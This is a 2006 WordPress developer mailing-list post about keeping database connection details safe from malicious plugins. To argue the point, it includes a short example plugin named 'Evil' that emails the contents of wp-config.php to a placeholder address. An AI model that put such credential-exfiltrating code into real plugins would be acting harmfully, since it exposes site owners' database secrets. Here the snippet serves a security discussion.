[wp-hackers] Keeping database connection info safe

Sam Angove sam at rephrase.net
Sat Feb 25 00:49:41 GMT 2006


On 2/25/06, Joseph Scott <joseph at randomnetworks.com> wrote:
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people".  So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.

<?php
/*
Plugin Name: Evil
*/
wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
'wp-config.php') );
?>

Dave Grijalva wrote:
> A better way to do this with php5 is to use private member variables and a
> setter function, but I don't think there is a PHP4 equivalent.  Can anybody
> out there think of a PHP4 compatible way to secure that data?

You could still read in the source file containing the setter, so
you're right back where you started.


More information about the wp-hackers mailing list